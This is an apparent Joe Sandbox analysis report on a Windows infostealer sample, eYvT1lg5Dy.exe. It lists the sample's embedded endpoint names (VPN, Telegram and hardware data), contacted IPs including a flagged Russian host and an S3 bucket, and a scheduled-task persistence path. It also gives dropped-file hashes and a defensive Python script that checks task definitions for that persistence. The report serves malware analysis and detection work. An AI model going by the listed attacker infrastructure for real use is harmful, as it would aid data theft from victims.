                      http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp, eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmp | false | | high
                      http://docs.oasis-open.org/ws-tx/wsat/2006/06/Prepared | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | | high
                      http://schemas.xmlsoap.org/ws/2004/08/addressing | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | | high
                      https://support.google.com/chrome/?p=plugin_shockwave | eYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmp | false | | high
                      http://tempuri.org/Endpoint/PartFtpConnectionsResponse | eYvT1lg5Dy.exe, 00000001.00000002.440804678.0000000005462000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                      http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | | high
                      http://tempuri.org/Endpoint/PartOpenVPN | eYvT1lg5Dy.exe, 00000001.00000002.437780252.0000000004F26000.00000004.00000001.sdmp, eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                      http://tempuri.org/Endpoint/EnvironmentSettingsResponse | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                      http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse | eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmp | false | | high
                      http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Cancel | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | | high
                      http://tempuri.org/Endpoint/PartOpenVPNResponse | eYvT1lg5Dy.exe, 00000001.00000002.437780252.0000000004F26000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | | high
                      http://schemas.xmlsoap.org/ws/2005/02/trust/Renew | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | | high
                      http://docs.oasis-open.org/ws-tx/wsat/2006/06/Durable2PC | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | | high
                      http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessageD | eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmp | false | | high
                      https://support.google.com/chrome/?p=plugin_wmp | eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmp | false | | high
                      http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/SCT/Cancel | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | | high
                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID | eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmp | false | | high
                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT | eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmp | false | | high
                      http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512 | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | | high
                      http://schemas.xmlsoap.org/ws/2006/02/addressingidentity | eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmp | false | | high
                      http://docs.oasis-open.org/ws-rx/wsrm/200702/AckRequested | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | | high
                      http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | | high
                      http://docs.oasis-open.org/ws-tx/wscoor/2006/06/RegisterResponse | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | | high
                      http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback | eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmp | false | | high
                      https://support.google.com/chrome/?p=plugin_java | eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmp | false | | high
                      http://docs.oasis-open.org/ws-tx/wsat/2006/06/Completion | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | | high
                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT | eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmp | false | | high
                      http://schemas.xmlsoap.org/ws/2004/06/addressingex | eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmp | false | | high
                      http://cli-4576347563476534786.s3.us-east-2.amazonaws.com | eYvT1lg5Dy.exe, 00000001.00000002.438333852.0000000004FD8000.00000004.00000001.sdmp | false | | high
                      http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Issue | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | | high
                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce | eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmp | false | | high
                      http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse | eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | false | | high
                                                                                                                                                                http://tempuri.org/Endpoint/PartProtonVPNeYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                unknown
                                                                                                                                                                http://docs.oasis-open.org/ws-tx/wsat/2006/06/CommiteYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://tempuri.org/Endpoint/PartHardwaresResponseeYvT1lg5Dy.exe, 00000001.00000002.437780252.0000000004F26000.00000004.00000001.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  http://tempuri.org/Endpoint/PartTelegramFilesResponseeYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/SCT/ReneweYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://support.google.com/chrome/?p=plugin_divxeYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://docs.oasis-open.org/ws-sx/ws-trust/200512eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdeYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentifeYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/CommittedeYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyeYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                      high

Contacted IPs


Public

IP | Domain | Country | ASN | ASN name | Malicious
52.219.104.152 | s3-r-w.us-east-2.amazonaws.com | United States | 16509 | AMAZON-02, US | false
80.87.192.249 | unknown | Russian Federation | 29182 | THEFIRST-AS, RU | true

General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 490258
Start date: 25.09.2021
Start time: 10:15:42
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 39s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: eYvT1lg5Dy.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 26
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@11/25@4/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 2.5% (good quality ratio 2.5%)
• Quality average: 91.2%
• Quality standard deviation: 8.9%
HCA Information:
• Successful, ratio: 53%
• Number of executed functions: 30
• Number of non-executed functions: 96
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.50.102.62, 104.26.12.31, 172.67.75.172, 104.26.13.31, 20.54.110.249, 40.112.88.60, 80.67.82.211, 80.67.82.235, 23.211.4.86
• Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time | Type | Description
10:17:09 | API Interceptor | 82x Sleep call for process: eYvT1lg5Dy.exe modified
10:17:24 | Task Scheduler | Run new task: Azure-Update-Task path: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe
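The scheduled task recorded above (Azure-Update-Task launching sihost.exe from the user's roaming profile) is the persistence artifact a responder would hunt for on other hosts. The genuine sihost.exe (Shell Infrastructure Host) lives only under C:\Windows\System32, so a copy under AppData is a name collision, not the real binary. The following Python triage script is an added example and is not part of the Joe Sandbox report: it parses Task Scheduler XML definitions (the format stored under C:\Windows\System32\Tasks and printed by schtasks /query /xml) and flags actions that run from user-writable paths or that reuse a Windows system binary name outside System32. The environment-variable table, the list of borrowed binary names and the two sample task definitions are constructed for this example.

```python
"""Triage Windows Task Scheduler XML definitions for persistence indicators.

Task definitions are stored as XML files under C:\\Windows\\System32\\Tasks and
are printed in the same format by `schtasks /query /tn <name> /xml`, so this
runs equally against a live export or files pulled from a disk image.
"""
import re
import xml.etree.ElementTree as ET

# Default namespace of Task Scheduler XML definitions.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Windows binary names that dropped payloads borrow (constructed list). Legitimate
# copies live only under %SystemRoot%\System32 (or SysWOW64); sihost.exe is Shell
# Infrastructure Host, the name the task in this report launches from %APPDATA%.
SYSTEM_BINARY_NAMES = {"sihost.exe", "svchost.exe", "dllhost.exe", "conhost.exe", "explorer.exe"}

# Assumed expansions for the environment variables a <Command> may use; on a
# live host take them from the task owner's environment instead.
ENV = {
    "%SYSTEMROOT%": r"C:\Windows",
    "%WINDIR%": r"C:\Windows",
    "%APPDATA%": r"C:\Users\user\AppData\Roaming",
    "%LOCALAPPDATA%": r"C:\Users\user\AppData\Local",
    "%USERPROFILE%": r"C:\Users\user",
    "%TEMP%": r"C:\Users\user\AppData\Local\Temp",
}

# Locations a standard user can write to, and the directories where the
# system binaries above are allowed to live.
USER_WRITABLE = re.compile(r"^[a-z]:\\users\\[^\\]+\\(?:appdata|downloads|desktop|documents)\\", re.I)
SYSTEM_DIRS = re.compile(r"^[a-z]:\\windows\\(?:system32|syswow64)\\", re.I)


def expand_env(path: str) -> str:
    """Expand %VAR% references using the ENV table (case-insensitive)."""
    return re.sub(r"%[^%]+%", lambda m: ENV.get(m.group(0).upper(), m.group(0)), path)


def exec_actions(task_xml: str):
    """Yield (command, arguments) for each <Exec> action in one task definition."""
    root = ET.fromstring(task_xml)
    for ex in root.findall(".//t:Actions/t:Exec", NS):
        cmd = ex.findtext("t:Command", default="", namespaces=NS)
        args = ex.findtext("t:Arguments", default="", namespaces=NS)
        yield cmd.strip().strip('"'), args.strip()


def assess_task(task_name: str, task_xml: str) -> list:
    """Return findings for one task; an empty list means nothing suspicious."""
    findings = []
    for cmd, _args in exec_actions(task_xml):
        path = expand_env(cmd)
        base = path.rsplit("\\", 1)[-1].lower()
        if USER_WRITABLE.search(path):
            findings.append(f"{task_name}: action runs from a user-writable path: {path}")
        if base in SYSTEM_BINARY_NAMES and not SYSTEM_DIRS.search(path):
            findings.append(f"{task_name}: system binary name {base} outside System32: {path}")
    return findings


# Constructed sample definitions. The first mirrors the task in this report;
# the second is a benign-looking task whose action lives under System32.
AZURE_UPDATE_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec><Command>C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe</Command></Exec>
  </Actions>
</Task>"""

BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec><Command>%SystemRoot%\System32\wsqmcons.exe</Command></Exec>
  </Actions>
</Task>"""


def triage(tasks: dict) -> dict:
    """Map task name -> findings for every task that produced at least one."""
    out = {}
    for name, xml in tasks.items():
        hits = assess_task(name, xml)
        if hits:
            out[name] = hits
    return out


if __name__ == "__main__":
    for name, hits in triage({"Azure-Update-Task": AZURE_UPDATE_TASK, "Consolidator": BENIGN_TASK}).items():
        for hit in hits:
            print(hit)
```

Run against a directory of collected task files by reading each file into `triage()`; task XML on disk is usually UTF-16 with a BOM, so decode it before parsing. The two checks are deliberately independent: a payload dropped under AppData trips the first, and a payload that copies itself to an unexpected directory under a system binary's name trips the second even when that directory is not user-writable.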

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection
80.87.192.249 | NWf7mrvHAE.exe | malicious

Domains

Match: s3-r-w.us-east-2.amazonaws.com

This is a shared Amazon S3 endpoint, so these co-occurrences show other samples that also fetched content from S3 rather than shared attacker infrastructure; the sample-specific indicator is the bucket name in the URL above (cli-4576347563476534786).

Associated Sample Name / URL | Detection | Context (IP)
oSv6Vgl6q4.msi | malicious | 52.219.88.16
NF_ELETRONICA.msi | malicious | 52.219.96.224
GeruDanfe.msi | malicious | 52.219.98.162
Scan0293994994995docs.exe | malicious | 52.219.103.10
NEWORDERTHP000002228.exe | malicious | 52.219.105.202
DHL Shipment Notification REF 210821.exe | malicious | 52.219.105.10
d3.exe | malicious | 52.219.101.218
REMITTANCE COPY QWY-7827 (1).xlsx | malicious | 52.219.98.194
TJ-eProtestoBoletoIndevido.msi | malicious | 52.219.100.224
ContratoAprovado+002336.msi | malicious | 52.219.84.8
Paystub for cwillard.html | malicious | 52.219.104.104
85OpNw6eXm.exe | malicious | 52.219.104.208
1fTUKmoHI8.exe | malicious | 52.219.102.242
Lma2EzVvAK.exe | malicious | 52.219.100.0
PDF-QRMMZSXXEOTXAQDCKONL.msi | malicious | 52.219.101.114
jugOYmJLWt.exe | malicious | 52.219.105.74
scan_745.htm | malicious | 52.219.98.146
Receipt779G0D675432.html | malicious | 52.219.97.138
                                                                                                                                                                                        XFtxEOd9S4.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 52.219.100.128
                                                                                                                                                                                        x1hr3jAjyo.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 52.219.105.122

ASN

Match | Associated Sample Name / URL | Detection | Context
THEFIRST-AS | RUhYuxGpuCIl.exe | malicious | 82.146.37.113
THEFIRST-AS | hr3wblVSZR.exe | malicious | 78.24.220.245
THEFIRST-AS | 3ydwOPCC9K.exe | malicious | 80.87.197.54
THEFIRST-AS | 5ygvlW6qIv.exe | malicious | 80.87.192.137
THEFIRST-AS | NWf7mrvHAE.exe | malicious | 80.87.192.249
THEFIRST-AS | kv3tG7gt3K.exe | malicious | 62.109.1.30
THEFIRST-AS | FwOpJZ3Pb7.exe | malicious | 94.250.250.1
THEFIRST-AS | YARJAFNTkh.exe | malicious | 62.109.1.30
THEFIRST-AS | C4erXJwD0y.exe | malicious | 79.174.13.108
THEFIRST-AS | DsMVfY2mO3.exe | malicious | 79.174.13.108
THEFIRST-AS | j4x3Cda0pI.exe | malicious | 79.174.13.108
THEFIRST-AS | E0ADA33F8B418F0F95705BBD210524F9CDA5E5307E3C2.exe | malicious | 94.250.249.239
THEFIRST-AS | Elon Musk Club - 024705 .htm | malicious | 83.220.173.134
THEFIRST-AS | i3UmAT06iE.exe | malicious | 94.250.251.116
THEFIRST-AS | Bonus Bitcoin - 065540 .htm | malicious | 83.220.173.134
THEFIRST-AS | biNmoafSHb.exe | malicious | 82.146.34.178
THEFIRST-AS | 8U5snojV8p.exe | malicious | 78.24.219.147
THEFIRST-AS | Q55oR43vHm.exe | malicious | 62.109.1.30
THEFIRST-AS | PUcvjsKtXq.exe | malicious | 92.63.102.119
THEFIRST-AS | E8w0y0HUy2.exe | malicious | 82.146.56.196
AMAZON-02US | ndx4U5fTTa | malicious | 18.136.42.110
AMAZON-02US | 4czqYWTUq8 | malicious | 18.222.178.34
AMAZON-02US | xUAaxUb8FS | malicious | 18.142.6.235
AMAZON-02US | sora.arm7 | malicious | 63.32.229.73
AMAZON-02US | sora.x86 | malicious | 54.119.141.92
AMAZON-02US | 2UPtT2H5ye | malicious | 18.245.41.200
AMAZON-02US | rW182CWZHv | malicious | 130.177.187.213
AMAZON-02US | U8pfFik1Bw | malicious | 34.249.145.219
AMAZON-02US | Hilix.x86 | malicious | 184.77.138.13
AMAZON-02US | cj6LIPaeUz.exe | malicious | 104.192.141.1
AMAZON-02US | Hilix.x86 | malicious | 54.102.91.63
AMAZON-02US | Hilix.arm | malicious | 65.1.203.109
AMAZON-02US | COURT-ORDER#S12GF803_zip.exe | malicious | 75.2.18.233
AMAZON-02US | ORDFOR.ppam | malicious | 104.192.141.1
AMAZON-02US | Anna.xlsx | malicious | 54.185.219.84
AMAZON-02US | x-8.6-.ASTOLFO | malicious | 34.249.145.219
AMAZON-02US | al#U0131nt#U0131 yapmak.exe | malicious | 65.9.71.37
AMAZON-02US | va8Rts13b8 | malicious | 52.198.167.186
AMAZON-02US | cs.exe | malicious | 54.183.123.73
AMAZON-02US | cs.exe | malicious | 13.225.29.25

JA3 Fingerprints

Match | Associated Sample Name / URL | Detection | Context
3b5074b1b5d032e5620f69f9f700ff0e | 4qwvsVLRyN.exe | malicious | 52.219.104.152
3b5074b1b5d032e5620f69f9f700ff0e | Minehack3.1.exe | malicious | 52.219.104.152
3b5074b1b5d032e5620f69f9f700ff0e | Atlasship_O2ASV706248.exe | malicious | 52.219.104.152
3b5074b1b5d032e5620f69f9f700ff0e | TT09876545678T8R456.exe | malicious | 52.219.104.152
3b5074b1b5d032e5620f69f9f700ff0e | Purchase 00036627-21.exe | malicious | 52.219.104.152
3b5074b1b5d032e5620f69f9f700ff0e | ssJJ6FZpme.exe | malicious | 52.219.104.152
3b5074b1b5d032e5620f69f9f700ff0e | TT3456522345.exe | malicious | 52.219.104.152
3b5074b1b5d032e5620f69f9f700ff0e | Soa.doc | malicious | 52.219.104.152
3b5074b1b5d032e5620f69f9f700ff0e | ZRR4xk4T6e.exe | malicious | 52.219.104.152
3b5074b1b5d032e5620f69f9f700ff0e | PO - Drawings And Specifications Sheet_PDF.exe | malicious | 52.219.104.152
3b5074b1b5d032e5620f69f9f700ff0e | kundeserv.exe | malicious | 52.219.104.152
3b5074b1b5d032e5620f69f9f700ff0e | HSBC Payment Advice_PDF.exe | malicious | 52.219.104.152
3b5074b1b5d032e5620f69f9f700ff0e | PO 9661051.exe | malicious | 52.219.104.152
3b5074b1b5d032e5620f69f9f700ff0e | XmedyuT2UA.exe | malicious | 52.219.104.152
3b5074b1b5d032e5620f69f9f700ff0e | WDZKAV4R3z.exe | malicious | 52.219.104.152
3b5074b1b5d032e5620f69f9f700ff0e | sS21qH5A7W.exe | malicious | 52.219.104.152
3b5074b1b5d032e5620f69f9f700ff0e | SetupPro_D1.exe | malicious | 52.219.104.152
3b5074b1b5d032e5620f69f9f700ff0e | SetupPro_D1.exe | malicious | 52.219.104.152
3b5074b1b5d032e5620f69f9f700ff0e | dhl.exe | malicious | 52.219.104.152
3b5074b1b5d032e5620f69f9f700ff0e | 9qoWR25iuC.exe | malicious | 52.219.104.152

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\eYvT1lg5Dy.exe.log
Process: C:\Users\user\Desktop\eYvT1lg5Dy.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 2291
Entropy (8bit): 5.3192079301865585
Encrypted: false
SSDEEP: 48:MIHKmfHK5HKXAHKhBHKdHKB1AHKzvQTHmYHKhQnoPtHoxHImHKYHZHxLHG1qHqHs:Pqaq5qXAqLqdqUqzcGYqhQnoPtIxHbqU
MD5: AC87262EF3296D7ECF33D548332613CF
SHA1: 4D9A75A7F7C75B4FF192D0D5B38E6DD735C85490
SHA-256: C3A3112ED6BFC3837321F60C34BE7911E451185CA285F5B92376F417993B2014
SHA-512: F38EE62232D98398B0704F5AB38718E9C97772F66FF188CC2072DD931FAEBFF3972D4E39511A01C8B42B7F43FE18917DCDEE28D4EE8FAAD6E6E256211101C907
Malicious: true
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b
C:\Users\user\AppData\Local\Temp\filename.exe
Process:C:\Users\user\Desktop\eYvT1lg5Dy.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):293376
Entropy (8bit):5.931158889112942
Encrypted:false
SSDEEP:3072:8V6xXhEcKxT2njS+HZlWBFhHxPfu0ay/MvZ6KaUnnXf3cUgH8ubSboIjFQkm5yUH:q+Xrc2njSelWbHPpOrnXfsUnubSRjF+
MD5:D508B954A785BDB77FDEFFCD4C56F8E5
SHA1:272273F6055837B0BACD96885B7840D117EF2676
SHA-256:2FE1087DD787D625F0AA84EADA3CC4F0A0E73B340B4AFEC366035F2916E9FC66
SHA-512:B11608356FE082CA661A97B49FF33B0E664A603492AC070621B72628AC71032CCB4F4F57C2380E912BD3819A29FCFCCA562D34B6D266809ACF8B94D28DDA4750
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 49%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."...f.y.f.y.f.y....M.y....v.y......y.o..e.y.f.x...y....g.y....g.y....g.y.Richf.y.................PE..L......_.....................(w.....`.............@...........................y.....)........................................+..(.....w.pG....................w..... ................................#..@............................................text............................... ..`.rdata..............................@..@.data....\u..@......................@....rsrc...pG....w..H...(..............@..@.reloc........w......p..............@..B................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\tmp450C.tmp
Process:C:\Users\user\Desktop\eYvT1lg5Dy.exe
File Type:ASCII text, with very long lines, with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.697336881644685
Encrypted:false
SSDEEP:24:DVE9Jf1tiezZxapTBz4fmlhQHdwc6WS/ZCGxruwyJM:Deu8xafWWKHj6Zx
MD5:08AF516B9E451DB9845289801A21F1BC
SHA1:D43E58D334ACFAE831AD929003D89DC6D3B499F9
SHA-256:C459EA8FCABD26C75606F78F91AA8446698D90422EE4869ABE4ABCCB50B45379
SHA-512:C8C2BB634740DBDDC5928E5FD3960011BB86842B72673FDCE2D65C86AE6D5945F0C88E81AE96DEA711CC654FAC8B4EC809DF18F57BFB4129503DE37E426CF055
Malicious:false
C:\Users\user\AppData\Local\Temp\tmp450D.tmp
Process:C:\Users\user\Desktop\eYvT1lg5Dy.exe
File Type:ASCII text, with very long lines, with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.699732953818543
Encrypted:false
SSDEEP:24:84HnNFe3vxyUDFktK2hDYjqaULhRGcVtUEn3iQw3M2qh0eQZnT:JnNk34UDFOt6uashRFVtUEnSQwbrV
MD5:9790C04CE1F6B62202E4E959572AFFDF
SHA1:48829C582A89E6EC74BFD85E01D2B6D73DDE4931
SHA-256:20AB8AFF0DDCBA296F3A9F2D2997DC3BE893ABBDF3B8F177D00FF718FF810B7E
SHA-512:8A702E988A39A50F9E4B8ECDEE15BD8D2B42D7B64D26663787237B83D721C5609B6D43CF2CEBBE3F0E0F44B36744017567B0AE3EBA64E728210D791E35A0DBA2
Malicious:false
C:\Users\user\AppData\Local\Temp\tmp4904.tmp
Process:C:\Users\user\Desktop\eYvT1lg5Dy.exe
File Type:SQLite 3.x database, last written using SQLite version 3032001
Category:dropped
Size (bytes):73728
Entropy (8bit):1.1874185457069584
Encrypted:false
SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:72A43D390E478BA9664F03951692D109
SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:false
